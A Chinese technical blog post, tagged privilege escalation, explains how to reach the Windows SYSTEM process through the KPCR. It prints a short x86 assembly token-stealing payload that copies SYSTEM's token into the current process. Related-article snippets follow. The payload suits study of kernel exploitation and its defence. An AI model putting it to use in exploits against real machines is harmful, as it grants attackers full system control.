通过kpcr 找到system 进程的地址

最新推荐文章于 2024-10-16 16:56:35 发布
最新推荐文章于 2024-10-16 16:56:35 发布
阅读量603 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: windows pwn 文章标签: 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_37921080/article/details/82635106
本文介绍了一种通过kpcr结构找到system进程,并替换其token来实现提权的技术。首先,从fs段获取kpcr,接着找到CurrentThread结构,进一步得到当前线程的kprocess。然后遍历进程链表定位到PID为4的system进程,最后将system进程的token复制到当前进程,完成提权操作。 
    __asm {
        pushad
        int 3
        mov eax, fs:[0x124]
        mov ebx, [eax + 0x50]
        mov eax, 4
        mov ecx, ebx

        SEARCH:
        mov ecx, [ecx + 0xb8]
        sub ecx, 0xb8
        cmp eax, [ecx + 0xb4]
        jnz SEARCH
        mov eax, [ecx + 0xf8]
        mov [ebx + 0xf8], eax

        popad
        ret 0x10
    }

这是一段通过替换token 来实现提权的 代码。
fs 段的起始地址即为 kpcr 的地址,其中fs:[124h] 指向的是kpcrb中的CurrentThread 机构,即当前线程。
接下来的 [eax + 50] 则指向了kthread 中的kprocess指针。所以这时得到了当前进程的kprocess。
然后从当前进程kprocess中找到ProcessListEntry 指针,遍历进程链表,找到一个进程号为4的进程,即为system 进程。

然后及那个system 进程的token 替换到 当前进程的token 即可实现提权。

linux内核--进程调度(一)
鱼思故渊的专栏
09-29 9985
引言:无论是在批处理系统还是分时系统中,用户进程数一般都多于处理机数、这将导致它们互相争夺处理机。另外,系统进程也同样需要使用处理机。这就要求进程调度程序按一定的策略,动态地把处理机分配给处于就绪队列中的某一个进程,以使之执行。   进程调度的具体功能可总结为如下几点:     作为进程调度的准备,进程管理模块必须将系统中各进程的执行情况和状态特征记录在各进程的PCB表中。并且,根据各
内核,任意地址写任意数据/固定数据模型
zhuhuibeishadiao
05-14 4967
实验环境 xp sp3 此实验将一个不常用的内核函数置0,然后R3申请了0地址的指针,将shellcode拷到此内存,内核并没有做ProbeForRead /Write检查 直接对传入的数据进行了修改,造成了任意地址写任意数据漏洞 ,了R3程序为system限 R3代码 主要获得一个函数的地址,将函数地址传入R0  R0将此函数地址置0,然后R3申请了一个0地址,将shel
操作系统的内核基地址
weixin_33724046的博客
11-05 578
操作系统的内核模块根据处理器的个数和是否支持PAE(Physical Address Extension物理地址扩展)分为以下四种 ntoskrnl.exe ---Uniprocessor单处理器,不支持PAE ntkrnlpa.exe ---Uniprocessor单处理器,支持PAE ntkrnlmp.exe ---Multiprocess...
如何得知SYSTEM进程里哪一个具体的进程占用了过多CPU?
weixin_30813225的博客
03-11 235
http://superuser.com/questions/527401/high-cpu-usage-by-the-system-process 在工作中,查看哪个进程占用过多CPU或内存不是那么简单的事,可能很多进程都依附于SYSTEM或是SVCHOST.EXE。 那么,如何进一步查看呢? 被微软收购的Process Explorer.就派上用场了。 Download and...
KPCR
stonesharp的专栏
11-08 4094
由于Windows需要支持多个CPU, 因此Windows内核中为此定义了一套以处理器控制区(Processor Control Region)即KPCR为枢纽的数据结构, 使每个CPU都有个KPCR. 其中KPCR这个结构中有一个域KPRCB(Kernel Processor Control Block)结构, 这个结构扩展了KPCR. 这两个结构用来保存与线程切换相关的全局信息.  通常fs
如何获得system和bin/sh的地址
Sakura给爷pwn全场
09-13 1299
如何获得system和bin/sh的地址
Linux system 内存寻址
leo.wang 技术专栏
11-26 874
翻阅《深入理解linux内核》之内存寻址章节,写此文章,作为总结。 X86架构,关于地址类型有3个重要概念:        逻辑地址(logical address)        每个逻辑地址由一个段地址和偏移量组成,偏移量指实际地址相对于段首的偏移。即logical addr = segment addr + offset        线性地址(linear addr
PEB和SPEB的推导
05-25
PEB(Process Environment Block)和SPEB(System Process Environment Block)都是Windows操作系统中的数据结构,用于存储进程或系统进程的运行环境信息。它们的推导如下: 首先,PEB和SPEB都是由KPCR(Kernel ...
精选_内核内存映射文件之获SSDT函数索引号_源码打包
03-11
2. **获SSDT地址**: 从KPCR结构中找到SSDT的基地址。这可能涉及到解构KPCR结构并读相应字段。 3. **遍历SSDT**: SSDT是一个函数指针数组,每个元素代表一个系统服务。遍历这个数组,记录每个函数的服务编号(即...
3.逆向分析KiSystemService(填充 _KTRAP_FRAME 部分)
Mikasys的博客
11-04 547
一、回顾 想要分析透彻,必须得了解之前的那些结构体(_KUSER_SHARED_DATA、_Trap_Frame、_KPCR、 _KTHREAD) 没看的同学先看一下之前的文章逆向分析ReadProcessMemory---->KiFastCallEntry 二、分析KiSystemService 由于上一篇分析KiFastCallEntry文章的难度更大,分析_KiSystemService的难度小一些,所以前面步骤省略,直接开始分析KiSystemService .text:00466481 _KiSy
win10 Ndis protocol Driver
05-22
win10 Ndis protocol driver 驱动开发,自己总结的一部分。
Linux System 内核地址空间布局
leo.wang 技术专栏
11-27 1077
内核态地址空间        0x00000000~0xBFFFFFFF 属于用户态空间,大小共3G; 0xC0000000~0xFFFFFFFF是内核态空间,大小共1G; 内存管理区        ZONE_DMA:   包含低于16MB的内存页框。 因为ISA总线的DMA控制器只能对低16MB寻址        ZONE_NORMAL:包含高于16MB到低于896MB的内存
System作为系统进程陔如何关闭?
Herman _java开发
12-17 8116
system进程是不可以关闭的,它是用来运行一些系统命令的,比如reboot、shutdown等,以及用来运行一些后台程序,比如ntfs-3g、v4l2loopback等。system进程也被用于运行一些内核模块,比如nvidia、atd等。system进程也被用于运行一些用户进程,这些进程由root用户启动,但随后变为system进程。这些进程包括:kworker/0:1-15581、kworker/0:0H-14488、kworker/0:0-15855等。
系统调用之_KPCR与_KPRCB
wxy_xx1的博客
10-16 458
查看KPCR地址:(当前查到的地址指向的是KPCR偏移0x120位置,所以需要减去0x120才是KPCR地址)段寄存器FS:[0]在驱动层指向_KPCR结构,当前运行核上的上下文环境。段寄存器FS:[0]在用户层指向TEB线程环境块,当前运行线程上下文。每一个CPU核都有一个KPCR结构体(一个CPU核心一个KPCR)WIN7x86 _KPRCB结构。WIN7x86 _KPCR结构。
KPCR学习
kernweak的博客
09-03 1926
KPCR:CPU控制区(Processor Control Region) KPCR介绍 KPCR相当于一个副本,存储着线程相关的一些重要信息,这样CPU在处理时就不用查线程了。 1) 当线程进入0环时,FS:[0]指向KPCR(3环时FS:[0] -> TEB) 2) 每个CPU都有一个KPCR结构体(一个核一个) 3) KPCR中存储了CPU本身要用的一些重要数据:GDT、...
35 进程与线程之KPCR
qq_18059143的博客
11-29 423
如果想逆向分析操作系统代码的,需要对段页的汇编代码熟悉,还需要知道三个结构体,进程结构体EPROCESS,ETHREAD,KPCR 下面来介绍KPCR KPCR是描述CPU的,准确说是描述当前正在运行的CPU的数据。 1、KPCR介绍 1) 当线程进入0环时,先切换FS,因为FS指向TEB。FS:[0]指向KPCR(3环时FS:[0] -> TEB) 2) 每个CPU都有一个KPCR...
EPROCESS+KPCR+ETHREAD部分介绍-学习记录
qq_36918532的博客
03-02 1252
**目前32位上结构体已经延展到了0x2bc ** _EPROCESS nt!_EPROCESS +0x000 Pcb : _KPROCESS 详细见下面 +0x098 ProcessLock : _EX_PUSH_LOCK 进程锁,和KPEOCESS不一样,只锁自己的结构 +0x0a0 CreateTime : _LARGE_INTEGER 进程创建时间 +0x0a8 ExitTime : _LARGE_INTEGER 进程退出时间 +0
3.KPCR
史D芬周
02-26 326
3.KPCR KPCR: CPU控制区(Processor Control Region) 当线程进入0环时, FS:[0]指向KPCR(3环时FS[0]-> TEB)每个CPU都有一个KPCR结构体(一个核一个)KPCR中存储了CPU本身要用的一些重要数据: GDT, IDT以及线程相关的一些信息。在winbbg中查看KPCR结构体 ...
kpcr进程结构里面的结构?
最新发布
08-11
> 说明:KPCR 通过 TSS 间接引用进程的 CR3,但 KPCR 本身 **不归属任何进程**。 --- ### 总结 - **KPCR 是 CPU 核心的私有管理结构**,用于维护硬件上下文(如 GDT/IDT/TSS)和当前线程状态。 - **进程结构(如 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值